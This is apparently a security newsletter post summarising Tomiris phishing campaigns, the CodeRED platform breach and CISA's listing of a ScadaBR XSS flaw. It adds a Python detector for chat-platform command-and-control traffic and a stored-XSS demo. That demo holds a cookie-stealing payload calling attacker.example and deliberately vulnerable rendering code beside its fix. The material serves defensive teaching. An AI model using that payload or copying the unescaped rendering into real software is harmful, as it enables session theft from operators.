
Aging Infrastructure Meets Modern Threats: Government & Public Safety Networks Breached

  • Writer: Yisda Technical Team
  • Dec 11, 2025
  • 3 min read

Governments and Critical Services Face Renewed Cyber Pressure


This week’s newsletter highlights a rise in cyber activity targeting government, public-safety, and industrial systems. Diplomatic and foreign ministry networks across Russia and Central Asia faced renewed pressure from the Tomiris threat group. In the United States, a breach of the legacy CodeRED emergency notification platform forced jurisdictions to take the system offline after stolen data surfaced online. Meanwhile, the Cybersecurity and Infrastructure Security Agency (CISA) added a long-standing OpenPLC ScadaBR vulnerability to its Known Exploited Vulnerabilities catalog after confirming active exploitation in industrial environments. Together, these developments highlight the risks posed by evolving threat actors, third-party breaches, and aging operational technology.

Control panel of a legacy operational technology (OT) system with an array of buttons, switches, and monitors.

Tomiris Intensifies Operations Against Diplomatic and Government Entities


A threat actor known as Tomiris has launched new operations against foreign ministries and government targets around the world, with recent activity concentrated in Russia and several Central Asian nations. These campaigns typically begin with spear-phishing emails that deliver password-protected archives containing malicious executables; the password keeps mail gateways from inspecting the archive contents, and the executables then install implants written in languages such as Rust, Go, C++, and Python. Once inside a network, Tomiris tools perform focused reconnaissance and search for potentially sensitive documents, with some components compiling lists of file paths rather than exfiltrating data immediately, all while using public services such as Telegram and Discord for command-and-control. The group also leverages open-source post-exploitation frameworks such as Havoc and AdaptixC2 after initial compromise to expand its control over infected systems. The combination of custom malware, off-the-shelf tooling, and command-and-control traffic blended into legitimate chat-platform traffic makes the activity harder to detect. Experts advise government and diplomatic networks to treat password-protected attachments with caution and to monitor sensitive systems for unusual connections to these services.

Access the full article here.


Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally
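Two of the defensive checks suggested above, written out as an added example for this newsletter (not tooling from the article, from the researchers who reported Tomiris, or from the actor itself). The first flags proxy log entries where a sensitive server talks to a Telegram or Discord API, or where any host uses a Telegram bot endpoint or Discord webhook. The second triages a ZIP attachment without knowing its password: the ZIP central directory stays in cleartext, so the encryption flag and the member names (an .exe dressed up as a .pdf) are readable before anything is extracted. The log format, hostnames, sensitive-host list and archive contents are all constructed for illustration.

```python
"""Two checks against the Tomiris tradecraft described above.

Added example for this newsletter; it is not tooling from the article, from
the researchers who reported Tomiris, or from the actor. The proxy log format,
hostnames, member names and the sensitive-host list are constructed.
"""
import io
import re
import struct
import zipfile

# Chat services the article names as command-and-control carriers.
C2_CARRIER_DOMAINS = ("api.telegram.org", "discord.com", "discordapp.com")

# Servers where chat-platform API traffic has no business purpose (constructed).
SENSITIVE_HOSTS = {"dms-fileserver01", "mfa-mail-gw", "consular-db02"}

# File types that should not arrive inside an e-mail archive.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".dll", ".lnk", ".js", ".vbs", ".bat", ".ps1")

# Constructed proxy log: timestamp source_host method dest_host path status
SAMPLE_PROXY_LOG = """\
2025-12-08T09:14:02Z ws-analyst17 GET discord.com /api/v9/gateway 200
2025-12-08T09:15:40Z dms-fileserver01 POST api.telegram.org /bot000000:TOKEN/sendDocument 200
2025-12-08T09:16:11Z consular-db02 POST discord.com /api/webhooks/1234/abcd 200
2025-12-08T09:17:03Z mfa-mail-gw GET update.example-av.test /defs/latest 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<dst>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


def is_carrier(host):
    """True for a Telegram/Discord API host or any of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in C2_CARRIER_DOMAINS)


def flag_c2_carrier_use(log_text, sensitive_hosts=SENSITIVE_HOSTS):
    """Return (src, dst, path) for requests worth an analyst's attention:
    a sensitive server reaching a chat-platform API at all, or any host using a
    Telegram bot endpoint or Discord webhook, the usual exfiltration channels."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_carrier(m["dst"]):
            continue
        src, dst, path = m["src"], m["dst"], m["path"]
        if src in sensitive_hosts or path.startswith("/bot") or "/api/webhooks/" in path:
            hits.append((src, dst, path))
    return hits


def triage_attachment(data):
    """Reasons to quarantine a ZIP attachment, read from the central directory,
    which stays in cleartext even when the members are password-protected:
    bit 0 of each member's general-purpose flags marks encryption, and member
    names reveal executables hiding behind a document-looking archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    reasons = []
    if any(info.flag_bits & 0x1 for info in infos):
        reasons.append("password-protected archive")
    for info in infos:
        if info.filename.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("executable member: " + info.filename)
    return reasons


def build_sample_archive(encrypted):
    """Constructed attachment: one EXE named like a PDF. zipfile cannot write
    encrypted archives, so the encryption bit is set by hand in the local header
    (flags at offset 6) and the central directory entry (flags at offset 8)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Invitation_Dec2025.pdf.exe", b"MZ" + b"\x00" * 62)
    data = bytearray(buf.getvalue())
    if encrypted:
        local = data.find(b"PK\x03\x04")
        central = data.find(b"PK\x01\x02")
        for off in (local + 6, central + 8):
            flags = struct.unpack_from("<H", data, off)[0] | 0x1
            struct.pack_into("<H", data, off, flags)
    return bytes(data)


if __name__ == "__main__":
    for hit in flag_c2_carrier_use(SAMPLE_PROXY_LOG):
        print("suspicious chat-API request:", hit)
    for encrypted in (True, False):
        print("attachment reasons:", triage_attachment(build_sample_archive(encrypted)))
```

The analyst workstation reaching the Discord gateway is deliberately not flagged: blocking or alerting on every Telegram or Discord connection is rarely sustainable, so the rule keys on where the request comes from and on the bot and webhook endpoints that carry file uploads. The attachment check is cheap enough to run on every inbound archive before any sandbox sees it.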

Emergency Notification Service Taken Offline After CodeRED Breach


OnSolve’s legacy CodeRED emergency notification platform was breached, and public safety agencies across the country took the system offline after data tied to the service was published online by a cybercriminal group. The INC Ransom gang claimed responsibility, reportedly stating that it breached the system earlier in November and encrypted files on November 10; the company has not confirmed those dates, and no ransom was paid. The company said the attack damaged systems within the legacy CodeRED environment, and officials have warned that user information such as names, addresses, email addresses, phone numbers, and passwords may have been exposed, prompting jurisdictions in several states to notify residents and urge them to change any password they had reused elsewhere. OnSolve decommissioned the legacy platform and is accelerating migration to its newer CodeRED by Crisis24 platform. The incident highlights third-party and supply-chain weaknesses, and how a compromise at a critical service provider can have broad impacts across emergency management and public safety operations.

Access the full article here.


CISA Highlights Active Exploitation of OpenPLC ScadaBR Vulnerability in Industrial Systems


The Cybersecurity and Infrastructure Security Agency (CISA) has added a long-known OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities (KEV) catalog after confirming that attackers are actively abusing it. Identified as CVE-2021-26829, the bug is a cross-site scripting issue in the system_settings.shtm component that lets an attacker inject script into the SCADA web interface and potentially hijack operator sessions or change configuration settings. Although the issue was disclosed several years ago, the agency’s update points to renewed exploitation against industrial control environments. Under Binding Operational Directive 22-01, federal civilian executive branch agencies must address the vulnerability by December 19, 2025. CISA also notes that the weakness may be present in products that embed ScadaBR components and urges organizations to patch where possible, audit third-party use of the software, and retire affected systems that cannot be secured.

Access the full article here.
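To make the vulnerability class concrete, here is a stored cross-site scripting flaw in a settings page beside its hardened form, as an added example written for this newsletter. It is not ScadaBR code (ScadaBR is a Java web application) and does not reproduce the actual system_settings.shtm defect; the setting name, HTML template and payload are constructed. The point it shows is the one that matters for the CVE: a value saved once by an attacker runs in the browser of every operator who later opens the page, unless the application encodes it on output.

```python
"""Stored XSS in a settings page, in the shape the CVE describes, beside the fix.

Added example for this newsletter. It is not ScadaBR code and does not
reproduce the real system_settings.shtm defect; the setting name, template
and payload are constructed.
"""
import html
import re

SETTINGS = {}  # constructed in-memory stand-in for the SCADA settings store

# Constructed payload: closes the value attribute, then runs script in the
# browser of every operator who later opens the settings page.
PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'

# Allowlist for free-text settings such as a description or instance name.
SAFE_TEXT_RE = re.compile(r"^[A-Za-z0-9 ._,-]{1,64}$")


def save_setting(name, value):
    """Vulnerable: stores whatever the form submits."""
    SETTINGS[name] = value


def render_vulnerable(name):
    """Vulnerable: the stored value is spliced into HTML unchanged, so a
    quote-and-angle-bracket payload becomes live markup (stored XSS)."""
    return '<input name="%s" value="%s">' % (name, SETTINGS[name])


def save_setting_validated(name, value):
    """Hardened, input side: reject values outside the allowlist.
    Returns True when saved, False when rejected."""
    if not SAFE_TEXT_RE.match(value):
        return False
    SETTINGS[name] = value
    return True


def render_hardened(name):
    """Hardened, output side: HTML-escape for the attribute context so <, >,
    &, " and ' are rendered as text. Output encoding is the fix that still
    holds when a value arrived through another path (import, database, API)."""
    return '<input name="%s" value="%s">' % (name, html.escape(SETTINGS[name], quote=True))


def contains_live_script(markup):
    """Crude oracle for the demo: an unescaped opening script tag."""
    return "<script" in markup.lower()


def demo():
    """Store the payload the vulnerable way, then render it both ways."""
    save_setting("instanceDescription", PAYLOAD)
    return {
        "vulnerable": contains_live_script(render_vulnerable("instanceDescription")),
        "hardened": contains_live_script(render_hardened("instanceDescription")),
    }


if __name__ == "__main__":
    print(demo())
    print("allowlist accepts payload:", save_setting_validated("instanceDescription", PAYLOAD))
```

The payload steals `document.cookie`, so marking the operator session cookie HttpOnly blunts that particular outcome, but it does not stop a script from changing settings through the operator's own authenticated session, which is why output encoding is the real fix. For deployed ScadaBR instances, that fix comes from the vendor patch the CISA entry points to, and from auditing products that embed ScadaBR, where the vulnerable page may be present without the ScadaBR name appearing in any inventory.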


The CISA logo featuring an eagle, shield, and infrastructure icons appears centered on a black background.

Yisda Takeaways


The topics of this week’s newsletter show how threat actors are expanding both their techniques and their target scope across critical sectors. Tomiris’s use of password-protected phishing archives, varied custom tooling, and command-and-control traffic hidden within common chat platforms illustrates how modern espionage operations are becoming increasingly difficult to detect. The breach of OnSolve’s legacy CodeRED platform underscores how a single vendor compromise can disrupt emergency notification capabilities across multiple jurisdictions. Meanwhile, CISA’s warning about active exploitation of an older OpenPLC ScadaBR vulnerability highlights how unpatched and inherited components continue to expose industrial networks to real-world risk. Together, these incidents reinforce the need to secure third-party integrations, strengthen defenses against email-borne threats, maintain visibility across operational environments, and prioritize remediation of known exploited vulnerabilities. Applying zero-trust principles to the most critical remote access pathways and continuing to reduce the organization’s overall attack surface round out that response.








